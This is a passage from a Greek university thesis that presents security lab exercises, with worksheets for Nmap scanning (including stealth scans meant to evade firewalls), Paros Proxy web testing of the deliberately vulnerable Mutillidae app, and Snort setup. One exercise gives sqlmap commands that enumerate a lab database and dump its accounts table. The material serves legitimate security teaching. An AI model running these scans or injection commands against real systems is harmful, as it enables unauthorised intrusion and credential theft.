Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

262 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

ΦΥΛΛΟ ΑΞΙΟΛΟΓΗΣΗΣ ΕΡΓΑΣΤΗΡΙΟΥ ΑΣΦΑΛΕΙΑΣ ΠΣ

Εργαλείο

NMAP

Ονοματεπώνυμο: Ημερομηνία:

Αρ. Μητρώου: e-mail:

Ονοματεπώνυμο/α συνεργάτη/τών:

Άσκηση: Όνομα & ΙΡ μηχανήματος:

Απαντήστε στα παρακάτω:

1. Ποια από της παραπάνω εντολές θα χρησιμοποιούσατε για να ελέγξετε ποιοι κόμβοι είναι ενεργοί

στο δίκτυο; Εκτελέστε την εντολή και καταγράψτε τους κόμβους που εντοπίστηκαν καθώς και την ΙΡ

διεύθυνσή τους.

2. Τρέξτε την εντολή nmap -sP -PT80 <ip_address/24>. Συγκρίνεται τα αποτελέσματα με

τα αποτελέσματα από την εκτέλεση της εντολής του 1ου ερωτήματος. Τι παρατηρείτε; Σε τι

διαφέρουν;

3. Τρέξτε την εντολή nmap -sT <ip_address>. Προσδιορίστε τη λειτουργία της. Καταγράψτε τα

ευρήματα σας.

4. Τρέξτε την εντολή nmap -sS <ip_address>. Ποια η λειτουργία της; Τι σκοπούς εξυπηρετεί;

Page 263: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

263 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

5. Τρέξτε την εντολή nmap -sU <ip_address>. Προσδιορίστε το είδος της πληροφορίας που

αποκομίσατε. Καταγράψτε τα ευρήματά σας.

6. Τρέξτε την εντολή nmap -sS -O <ip_address>. Τι είδους ανίχνευση πραγματοποιεί;

Καταγράψτε τα ευρήματά σας.

7. Συντάξτε μια σύνθετη εντολή η οποία θα πραγματοποιεί σάρωση στις θύρες 21, 23, 53 και 80 και

ταυτόχρονα θα κάνει και ανίχνευση λειτουργικού. Ελέγξτε την ορθότητα της σύνταξης τρέχοντάς την

στο nmap και καταγράψτε τα ευρήματά σας.

8. Εντόπισε το εργαλείο ευπαθείς και μη απαραίτητες υπηρεσίες να εκτελούνται σε θύρες των Κόμβους

του δικτύου; Αν ναι προσδιορίστε τες.

Page 264: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

264 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

6.8.3 Σύνθετη Άσκηση

ΕΡΓΑΣΤΗΡΙΑΚΗ ΑΣΚΗΣΗ 3

ΓΙΑ ΤΟ ΕΡΓΑΛΕΙΟ

NMAP

Εργαλείο NMAP

Γνωστικό Πεδίο Εξερεύνηση δικτύου (Network Scanning)

Τύπος Άσκησης Τεχνική

Βαθμός Δυσκολίας 3

Συμμετοχή Ομάδες 2 ατόμων

Ώρες Διδασκαλίας 60 Λεπτά

Στόχος Στόχος αυτής της άσκησης είναι η εξοικείωση των φοιτητών με τις τεχνικές αναγνώρισης ενός απομακρυσμένου στόχου που χρησιμοποιούν οι επιτιθέμενοι. Αναμένεται μέσω αυτής της άσκησης οι φοιτητές να κατανοήσουν: • τα βήματα που ακολουθούν οι επιτιθέμενοι προκειμένου να συλλέξουν πληροφορίες για

έναν απομακρυσμένο στόχο • η αποκωδικοποίηση των πληροφοριών που συλλέγονται από τον απομακρυσμένο στόχο • ο εντοπισμός των ευπαθών σημείων του απομακρυσμένου στόχου Περιγραφή Οι φοιτητές θα πρέπει να εκκινήσουν το BackTrack 4 σε Virtual Machine και να ενεργοποιήσουν τη δικτυακή σύνδεση. Η ενεργοποίηση γίνεται ανοίγοντας ένα τερματικό και πληκτρολογώντας ifconfig eth0 up και στη συνέχεια dhclient eth0. Στη συνέχεια από το K Menu επιλέγουν BackTrack->Network Mapping->All->Nmap. Σε αυτή την άσκηση οι φοιτητές πρέπει να συλλέξουν πληροφορίες για τον απομακρυσμένο στόχο http://scanme.insecure.org/ . Συγκεκριμένα θα πρέπει να ανιχνεύσουν: • αν ο στόχος είναι ενεργός, • να εντοπίσουν τις ενεργές θύρες • να προσδιορίσουν τις υπηρεσίες που εκτελούνται στις θύρες • να προσδιορίσουν το λειτουργικό που χρησιμοποιεί ο απομακρυσμένος στόχος • να πραγματοποιήσουν κρυφή (stealth) ανίχνευση στόχου • να αποθηκεύσουν τα αποτελέσματα της σάρωσης σε αρχείο Παραδοτέο Με την ολοκλήρωση της άσκησης οι φοιτητές θα πρέπει να συμπληρώσουν και να παραδώσουν το ακόλουθο έντυπο.

Page 265: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

265 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

ΦΥΛΛΟ ΑΞΙΟΛΟΓΗΣΗΣ ΕΡΓΑΣΤΗΡΙΟΥ ΑΣΦΑΛΕΙΑΣ ΠΣ

Εργαλείο

NMAP

Ονοματεπώνυμο: Ημερομηνία:

Αρ. Μητρώου: e-mail:

Ονοματεπώνυμο/α συνεργάτη/τών:

Άσκηση: Όνομα & ΙΡ μηχανήματος:

Απαντήστε στα παρακάτω:

1. Ποια εντολή θα χρησιμοποιούσατε για να προσδιορίσετε αν το μηχάνημα στόχος είναι ενεργό;

Αιτιολογήστε την επιλογή σας. Τρέξτε την εντολή και καταγράψτε τα ευρήματά σας.

2. Αν δεν θέλετε να εντοπιστεί η ανίχνευση του στόχου από κάποιο ανάχωμα ασφάλειας (firewall) ποιες

τεχνικές ανίχνευσης θα χρησιμοποιούσατε; Σχολιάστε και αιτιολογήστε την αξιοπιστία των

αποτελεσμάτων που παρέχει η κάθε μια από αυτές.

3. Προσδιορίστε μια τεχνική σάρωσης θυρών και αιτιολογήστε τις επιλογές σας. Τρέξτε την εντολή και

καταγράψτε τα ευρήματά σας.

4. Προσδιορίστε μια τεχνική εντοπισμού του λειτουργικού και της έκδοσής του που χρησιμοποιείται

στον απομακρυσμένο στόχο. Εκτελέστε την εντολή και καταγράψτε τα ευρήματά σας.

5. Πραγματοποιήστε σάρωση για των εντοπισμό ανοιχτών UDP θυρών. Καταγράψτε τα ευρήματά σας.

Page 266: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

266 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

6. Πραγματοποιήστε σάρωση θυρών και ανίχνευση λειτουργικού και αποθηκεύστε τα αποτελέσματα σε

ένα .txt αρχείο. Καταγράψτε την τεχνική που χρησιμοποιήσατε. Εκτυπώστε το .txt αρχείο και

επισυνάψτε το στο φύλλο αξιολόγησης.

7. Αν ο επιτιθέμενος ήσασταν εσείς, ποιες από τις πληροφορίες που συλλέξατε θα σας ήταν χρήσιμες

και με ποιόν τρόπο;

Page 267: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

267 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

6.9 Paros Proxy

6.9.1 Εισαγωγική Άσκηση

ΕΡΓΑΣΤΗΡΙΑΚΗ ΑΣΚΗΣΗ 1

ΓΙΑ ΤΟ ΕΡΓΑΛΕΙΟ

PAROS PROXY

Εργαλείο PAROS PROXY

Γνωστικό Πεδίο Εντοπισμός Ευπαθειών Εφαρμογών Ιστού

(Web Vulnerability Scanning)

Τύπος Άσκησης Τεχνική

Βαθμός Δυσκολίας 1

Συμμετοχή Ομάδες 2 ατόμων

Ώρες Διδασκαλίας 60 Λεπτά

Στόχος

Στόχος αυτής της άσκησης είναι η εξοικείωση των φοιτητών με τις βασικές δυνατότητες του

εργαλείου καθώς και ο προσδιορισμός των πληροφοριών που μπορεί να συλλέξει ένας

επιτιθέμενος, παρεμβάλλοντας έναν Proxy Server, από μια web εφαρμογή. Αναμένεται μέσω

αυτής της άσκησης οι φοιτητές να κατανοήσουν:

• τις πληροφορίες που μπορούν να ανιχνεύσουν από την επικοινωνία μεταξύ server και

client

• τις συχνά εμφανιζόμενες ευπάθειες των web εφαρμογών

• τον τρόπο με τον οποίο μπορούν να αξιοποιήσουν τις πληροφορίες που συλλέγουν

Περιγραφή

Οι φοιτητές θα πρέπει να εκκινήσουν το BackTrack 4 σε Virtual Machine και να

ενεργοποιήσουν τη δικτυακή σύνδεση. Η ενεργοποίηση γίνεται ανοίγοντας ένα τερματικό

και πληκτρολογώντας ifconfig eth0 up και στη συνέχεια dhclient eth0. Έπειτα

θα πρέπει να ρυθμίσουν τον φυλλομετρητή ιστού έτσι ώστε να συνδέεται μέσω του Paros

Proxy Server (ΗΤΤΡ Proxy: 127.0.0.1, Port: 8080). Στη συνέχεια θα εκκινήσουν το εικονικό

PC: Vulnerable XP Professional. Από το K Menu του BackTrack 4 επιλέγουν BackTrack->Web Application Analysisis->Web (frontend->Paros

Proxy: Τέλος, με τη χρήση του φυλλομετρητή θα προσπελάσουν τη web εφαρμογή xampp

Page 268: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

268 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

χρησιμοποιώντας τη διεύθυνση http://διευθυνση κόμβου που φιλοξενεί την εφαρμογή στο

δίκτυο/Mutillidae. (π.χ. http://192.168.1.6/ mutillidae ) και θα πραγματοποιήσουν τις εξής

ενέργειες:

• να γίνει καταγραφή της ιεραρχικής δομής της εφαρμογής μέσω της λειτουργίας Spider

• να καθοριστεί μια πολιτική σάρωσης

• να πραγματοποιηθεί σάρωση

Παραδοτέο

Με την ολοκλήρωση της άσκησης οι φοιτητές θα πρέπει να συμπληρώσουν και να

παραδώσουν το ακόλουθο έντυπο.

Page 269: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

269 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

ΦΥΛΛΟ ΑΞΙΟΛΟΓΗΣΗΣ ΕΡΓΑΣΤΗΡΙΟΥ ΑΣΦΑΛΕΙΑΣ ΠΣ

Εργαλείο

Paros Proxy

Ονοματεπώνυμο: Ημερομηνία:

Αρ. Μητρώου: e-mail:

Ονοματεπώνυμο/α συνεργάτη/τών:

Άσκηση: Όνομα & ΙΡ μηχανήματος:

Απαντήστε στα παρακάτω:

1. Αφού χρησιμοποιήσετε τη λειτουργία Spider του εργαλείου καταγράψτε την ιεραρχική δομή της web

εφαρμογής. Ποια η χρησιμότητα αυτής της λειτουργίας;

2. Καθορίστε μια πολιτική σάρωσης της web εφαρμογής. Ποια είδη ελέγχων θεωρείτε κρίσιμα;

3. Πόσες ευπάθειες εντόπισε το εργαλείο; Καταγράψτε τες με βάση την κρισιμότητα και το είδος τους.

4. Ποιες από τις πληροφορίες που συλλέξατε με τη σάρωση της εφαρμογής μπορούν να φανούν

χρήσιμες σε έναν επιτιθέμενο και με ποιον τρόπο;

5. Στη σάρωση που πραγματοποιήσατε εντοπίστηκαν λογαριασμοί χρηστών και συνθηματικά; Αν ναι

καταγράψτε τα και προσδιορίστε τη συγκεκριμένη ευπάθεια της web εφαρμογής.

Page 270: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

270 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

6.9.2 Μέτριας Εντάσεως Άσκηση

ΕΡΓΑΣΤΗΡΙΑΚΗ ΑΣΚΗΣΗ 2

ΓΙΑ ΤΟ ΕΡΓΑΛΕΙΟ

PAROS PROXY

Εργαλείο PAROS PROXY

Γνωστικό Πεδίο Εντοπισμός Ευπαθειών Εφαρμογών Ιστού

(Web Vulnerability Scanning)

Τύπος Άσκησης Τεχνική

Βαθμός Δυσκολίας 2

Συμμετοχή Ομάδες 2 ατόμων

Ώρες Διδασκαλίας 60 Λεπτά

Στόχος

Στόχος αυτής της άσκησης είναι η κατανόηση του τρόπου με τον οποίο λειτουργούν τα

αιτήματα και οι αποκρίσεις μιας web εφαρμογής καθώς και των πληροφοριών που μπορούν

να συλλέξουν από αυτά οι επιτιθέμενοι. Αναμένεται μέσω αυτής της άσκησης οι φοιτητές να

κατανοήσουν έννοιες σχετικά με:

• τα GET αιτήματα και τις POST αποκρίσεις μιας web εφαρμογής

• τη λειτουργία των cookies και τη χρησιμότητά τους σε έναν επιτιθέμενο

• την παγίδευση των αιτημάτων και των αποκρίσεων

Περιγραφή

Οι φοιτητές θα πρέπει να εκκινήσουν το BackTrack 4 σε Virtual Machine και να

ενεργοποιήσουν τη δικτυακή σύνδεση. Η ενεργοποίηση γίνεται ανοίγοντας ένα τερματικό

και πληκτρολογώντας ifconfig eth0 up και στη συνέχεια dhclient eth0. Έπειτα

θα πρέπει να ρυθμίσουν τον φυλλομετρητή ιστού έτσι ώστε να συνδέεται μέσω του Paros

Proxy Server (ΗΤΤΡ Proxy: 127.0.0.1, Port: 8080). Στη συνέχεια θα εκκινήσουν το εικονικό

PC: Vulnerable XP Professional. Από το K Menu του BackTrack 4 επιλέγουν BackTrack->Web Application Analysisis->Web (frontend->Paros

Proxy: Τέλος, με τη χρήση του φυλλομετρητή θα προσπελάσουν τη web εφαρμογή xampp

χρησιμοποιώντας τη διεύθυνση http://διευθυνση κόμβου που φιλοξενεί την εφαρμογή στο

Page 271: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

271 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

δίκτυο/Mutillidae. (π.χ. http://192.168.1.6/ mutillidae ) και θα πραγματοποιήσουν τις εξής

ενέργειες:

• να κάνουν είσοδο και να πλοηγηθούν στη web εφαρμογή και θα μελετήσουν τα αιτήματα

και της αποκρίσεις της

• να παγιδεύσουν cookies και να προσπαθήσουν να πραγματοποιήσουν είσοδο στη web

εφαρμογή

• να προσπαθήσουν να προσδιορίσουν συνθηματικά μέσω του Endoder/Hash

Παραδοτέο

Με την ολοκλήρωση της άσκησης οι φοιτητές θα πρέπει να συμπληρώσουν και να

παραδώσουν το ακόλουθο έντυπο.

Page 272: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

272 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

ΦΥΛΛΟ ΑΞΙΟΛΟΓΗΣΗΣ ΕΡΓΑΣΤΗΡΙΟΥ ΑΣΦΑΛΕΙΑΣ ΠΣ

Εργαλείο

Paros Proxy

Ονοματεπώνυμο: Ημερομηνία:

Αρ. Μητρώου: e-mail:

Ονοματεπώνυμο/α συνεργάτη/τών:

Άσκηση: Όνομα & ΙΡ μηχανήματος:

Απαντήστε στα παρακάτω:

1. Τι είδους πληροφορίες μπορείτε να εξάγετε από την παρακολούθηση των αιτημάτων και των

αποκρίσεων της εφαρμογής;

2. Πώς μπορούν να αξιοποιηθούν τα cookies;

3. Τι επιτυγχάνεται με την παγίδευση των αιτημάτων και των αποκρίσεων της web εφαρμογής; Πως

μπορεί να αξιοποιηθεί αυτό από έναν επιτιθέμενο.

4. Προσπαθήστε να προσδιορίστε τα συνθηματικά που χρησιμοποιεί η εφαρμογή χρησιμοποιώντας την

επιλογή Encoder/Hash. Καταγράψτε τα αποτελέσματα.

5. Προτείνετε τρόπους για την αντιμετώπιση των ευπαθειών της εφαρμογής.

Page 273: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

273 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

6.9.3 Σύνθετη Άσκηση

ΕΡΓΑΣΤΗΡΙΑΚΗ ΑΣΚΗΣΗ 3

ΓΙΑ ΤΟ ΕΡΓΑΛΕΙΟ

PAROS PROXY

Εργαλείο PAROS PROXY

Γνωστικό Πεδίο Εντοπισμός Ευπαθειών Εφαρμογών Ιστού

(Web Vulnerability Scanning)

Τύπος Άσκησης Τεχνική

Βαθμός Δυσκολίας 3

Συμμετοχή Ομάδες 2 ατόμων

Ώρες Διδασκαλίας 60 Λεπτά

Στόχος Στό χο ς αυτής της άσκησης είναι ο εντο πισμό ς και η εκμετάλλευση μιας ευπάθειας του πληροφοριακού συστήματος η οποία εντοπίζεται σε μια εφαρμογή web. Αναμένεται μέσω αυτής της άσκησης οι φοιτητές να κατανοήσουν:

• την κρισιμότητα των ευπαθειών για την ασφάλεια του πληροφοριακού συστήματος

• τις μεθόδους και τις τεχνικές που χρησιμοποιούν οι επιτιθέμενοι

• το είδος των πληροφοριών που μπορούν να συλλεχτούν από μια ευπαθή web εφαρμογή Περιγραφή72

Οι φοιτητές θα πρέπει να εκκινήσουν το BackTrack 4 σε Virtual Machine και να ενεργοποιήσουν τη δικτυακή σύνδεση. Η ενεργοποίηση γίνεται ανοίγοντας ένα τερματικό

και πληκτρολογώντας ifconfig eth0 up και στη συνέχεια dhclient eth0. Έπειτα θα πρέπει να ρυθμίσουν τον φυλλομετρητή ιστού έτσι ώστε να συνδέεται μέσω του Paros Proxy Server (ΗΤΤΡ Proxy: 127.0.0.1, Port: 8080). Στη συνέχεια θα εκκινήσουν το εικονικό PC: Vulnerable XP Professional. Από το K Menu του BackTrack 4 επιλέγουν BackTrack->Web Application Analysisis->Web (frontend)->Paros

Proxy: Τέλος, με τη χρήση του φυλλομετρητή θα προσπελάσουν τη web εφαρμογή

Mutillidae χρησιμοποιώντας τη διεύθυνση http://διευθυνση κόμβου που φιλοξενεί την εφαρμογή στο δίκτυο/Mutillidae. (π.χ.

http://192.168.1.6/ mutillidae ) και θα πραγματοποιήσουν τις εξής ενέργειες:

• είσοδο στην εφαρμογή ως διαχειριστές χρησιμοποιώντας τα εξής συνθηματικά: o username : admin

72 http://www.omgsecurity.com/2009/06/blind-sql-injection-of-post-vars-with-sqlmap/#more-25

Page 274: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

274 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

o password : adminpass

• πραγματοποίηση σάρωσης της εφαρμογής Αφού ολοκληρωθεί η παραπάνω διαδικασία θα πρέπει να ενεργοποιηθεί η εφαρμογή sqlmap από το K Menu του BackTrack 4 επιλέγοντας BackTrack->Web

Application Analysisis->Database (backend)->MYSQL->SQLmap.

Έπειτα θα χρησιμοποιήσουν τις εξής εντολές: Εντολή 1 python sqlmap.py -u

"http://ΧΧΧ.ΧΧΧ.Χ.Χ/mutillidae/index.php?page=login.php" --

method "POST" --data

"user_name=admin&password=adminpass&Submit_button=Submit" Εντολή 2 python sqlmap.py -u

"http://192.168.1.6/mutillidae/index.php?page=login.php" --

method "POST" --data

"user_name=admin&password=adminpass&Submit_button=Submit" --

dbs

Εντολή 3 python sqlmap.py -u

"http://192.168.1.6/mutillidae/index.php?page=login.php" --

method "POST" --data

"user_name=admin&password=adminpass&Submit_button=Submit" --

tables -D owasp10

Εντολή 4 python sqlmap.py -u

"http://192.168.1.6/mutillidae/index.php?page=login.php" --

method "POST" --data

"user_name=admin&password=adminpass&Submit_button=Submit" -D

owasp10 -T accounts --dump

Παραδοτέο Με την ολοκλήρωση της άσκησης οι φοιτητές θα πρέπει να συμπληρώσουν και να παραδώσουν το ακόλουθο έντυπο.

Page 275: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

275 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

ΦΥΛΛΟ ΑΞΙΟΛΟΓΗΣΗΣ ΕΡΓΑΣΤΗΡΙΟΥ ΑΣΦΑΛΕΙΑΣ ΠΣ

Εργαλείο

Paros Proxy

Ονοματεπώνυμο: Ημερομηνία:

Αρ. Μητρώου: e-mail:

Ονοματεπώνυμο/α συνεργάτη/τών:

Άσκηση: Όνομα & ΙΡ μηχανήματος:

Απαντήστε στα παρακάτω:

1. Το Paros Proxy εντόπισε τα συνθηματικά που χρησιμοποιήσατε κατά την είσοδο σας στην εφαρμογή;

Αν ναι καταγράψτε την πληροφορία όπως ακριβώς εμφανίζεται στην περιοχή δεδομένων του Paros

Proxy.

2. Ποια από τις κρίσιμες ευπάθειες που εντόπισε το εργαλείο αφορά τη βάση δεδομένων της web

εφαρμογής; Πώς μπορεί να την εκμεταλλευτεί ένας επιτιθέμενος;

3. Τι πληροφορίες συλλέξατε με το εργαλείο SQLmap για το server που φιλοξενεί την εφαρμογή web;

Πόσες βάσεις δεδομένων εντοπίστηκαν;

4. Ποιες κρίσιμες πληροφορίες συλλέξατε από τη βάση “owasp10”; Γιατί είναι κρίσιμες?

5. Πώς μπορεί ένας επιτιθέμενος να αξιοποιήσει τις πληροφορίες που συνέλεξε και να θέσει σε κίνδυνο

το ΠΣ;

Page 276: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

276 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

6.10 Snort

6.10.1 Εισαγωγική Άσκηση

ΕΡΓΑΣΤΗΡΙΑΚΗ ΑΣΚΗΣΗ 1

ΓΙΑ ΤΟ ΕΡΓΑΛΕΙΟ

Snort

Εργαλείο Snort

Γνωστικό Πεδίο Ανίχνευση Εισβολών (Intrusion Detection)

Τύπος Άσκησης Τεχνική

Βαθμός Δυσκολίας 1

Συμμετοχή Ομάδες 2 ατόμων

Ώρες Διδασκαλίας 45 Λεπτά

Στόχος

Στόχος αυτής της άσκησης είναι η εξοικείωση των φοιτητών με τη χρήση του εργαλείου.

Αναμένεται μέσω αυτής της άσκησης οι φοιτητές να μάθουν να:

• εγκαθιστούν το εργαλείο σε ένα μηχάνημα με Windows XP και να πραγματοποιούν

ενημέρωση των κανόνων

• λειτουργούν το εργαλείο ως Sniffer, Packet Logger και IDS

Περιγραφή

Αρχικά θα πρέπει να γίνει λήψη της εφαρμογής και των κανόνων από την τοποθεσία

www.snort.org. Προτείνεται η λήψη να γίνει πριν την έναρξη του μαθήματος από τον

εισηγητή. Επισημαίνεται ότι για τη λήψη των κανόνων (rules) απαιτείται registration. Αφού

εγκατασταθεί το εργαλείο θα πρέπει να εισαχθούν οι κανόνες στο αρχείο

C:\Snort\Rules και του αρχείου snort.conf στο φάκελο C:\Snort\etc.

Στη συνέχεια θα πρέπει να γίνουν οι απαραίτητες ρυθμίσεις για το δίκτυο, το αρχείο

καταγραφής, τον κατάλογο των κανόνων και της βιβλιοθήκες που θα χρησιμοποιήσει η

εφαρμογή στο αρχείο C:\Snort\etc \snort.conf.73

Μόλις ολοκληρωθεί η διαδικασία ανοίγεται ένα παράθυρο γραμμής εντολών και

πληκτρολογείται διαδοχικά:

C:\cd Snort

73 Χρήσιμο είναι το εξής βίντεο: http://www.youtube.com/watch?v=nAWN989WA0A

Page 277: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

277 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

C:\Snort\cd bin

C:\Snort\bin\snort help

Εμφανίζονται οι διάφορες επιλογές λειτουργίας του εργαλείου.

Παραδοτέο

